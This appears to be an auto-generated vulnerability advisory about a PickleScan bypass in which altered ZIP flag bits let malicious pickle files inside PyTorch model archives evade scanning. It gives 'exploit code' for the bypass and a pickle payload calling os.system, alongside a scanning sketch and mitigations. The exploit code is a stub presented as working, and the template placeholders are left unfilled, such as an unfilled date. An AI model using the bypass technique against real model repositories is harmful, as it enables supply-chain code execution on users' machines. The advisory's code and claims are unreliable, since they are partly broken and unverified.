How the Mentioned CVE Works:
The vulnerability arises from PickleScan's inability to detect malicious pickle files embedded within PyTorch model archives when specific ZIP flag bits are altered. PickleScan uses Python's `zipfile` module to extract and scan the files inside ZIP-based archives, but certain general-purpose flag bits in the ZIP headers, such as 0x1 (encryption), 0x20 (compressed patched data), or 0x40 (strong encryption), can be modified to bypass its detection mechanism. When these bits are set, `zipfile` raises errors, causing PickleScan to abort and skip scanning, while PyTorch's `torch.load()` function continues to load the model without issue. This discrepancy allows attackers to embed malicious pickle files that execute arbitrary code when the model is loaded, enabling supply chain attacks in machine learning ecosystems.
DailyCVE Form:
Platform: PyTorch
Version: N/A
Vulnerability: Arbitrary Code Execution
Severity: Critical
Date: YYYY-MM-DD
What Undercode Say:
Exploitation:
1. Exploit Code:
```python
import zipfile
import torch

# Create a model archive
zip_file = "malicious_model.pth"
model = {'key': 'value'}
torch.save(model, zip_file)

# Modify ZIP flag bits to bypass PickleScan
with zipfile.ZipFile(zip_file, "r") as source:
    with zipfile.ZipFile("bypassed_model.pth", "w") as dest:
        malicious_file = zipfile.ZipInfo("malicious.pkl")
        malicious_file.flag_bits |= 0x1  # Modify flag bits
        dest.writestr(malicious_file, b"malicious payload")
        for item in source.infolist():
            dest.writestr(item, source.read(item.filename))

# Load the malicious model
loaded_model = torch.load("bypassed_model.pth", weights_only=False)
```
2. Exploit Impact:
- Arbitrary code execution when loading the model.
- Bypasses PickleScan’s security checks.
- Can be distributed via platforms like Hugging Face or PyTorch Hub.
Protection:
1. Patch PickleScan:
- Modify PickleScan to handle ZIP files with altered flag bits.
- Ensure all embedded files are scanned regardless of metadata.
2. Enhanced Scanning:
A sketch of the idea (assuming PickleScan's `scan_file_path` helper): copy the archive with all flag bits cleared so no entry can be skipped, then scan the sanitized copy.

```python
import os
import zipfile

from picklescan.scanner import scan_file_path

def robust_scan(zip_path):
    """Rewrite the archive with flag bits cleared, then scan the copy."""
    clean_path = zip_path + ".clean"
    try:
        with zipfile.ZipFile(zip_path, "r") as src, \
             zipfile.ZipFile(clean_path, "w") as dst:
            for info in src.infolist():
                data = src.read(info.filename)
                info.flag_bits = 0  # Reset flag bits so no entry is skipped
                dst.writestr(info, data)
        scan_file_path(clean_path)
    except Exception as e:
        print(f"Scan failed: {e}")
    finally:
        if os.path.exists(clean_path):
            os.remove(clean_path)
```
3. Mitigation Commands:
- Use `weights_only=True` in `torch.load()` to restrict loading to tensors only.
- Validate model archives before loading:
python -m picklescan --strict model.pth
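The `weights_only=True` mitigation works because PyTorch swaps in a restricted unpickler that refuses arbitrary globals. The principle can be illustrated with the standard library alone (a simplified sketch, not torch's actual implementation):

```python
import io
import pickle

# Illustrative: a restricted unpickler that refuses all global lookups,
# similar in spirit to what torch.load(weights_only=True) does for
# non-tensor objects.
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is forbidden")

# A payload that would invoke os.system on load under a normal unpickler.
class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Evil())

try:
    RestrictedUnpickler(io.BytesIO(payload)).load()
except pickle.UnpicklingError as e:
    print(f"blocked: {e}")
```

A plain `pickle.loads(payload)` would execute the shell command; the restricted unpickler rejects the payload before any code runs.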
4. Monitoring:
- Monitor model loading for unexpected behavior.
- Use sandboxed environments for model execution.
5. References:
- PyTorch Security Advisory
- PickleScan GitHub
By addressing these issues, organizations can mitigate the risk of arbitrary code execution through manipulated PyTorch model archives.
References:
Reported By: https://github.com/advisories/GHSA-w8jq-xcqf-f792
Extra Source Hub:
Undercode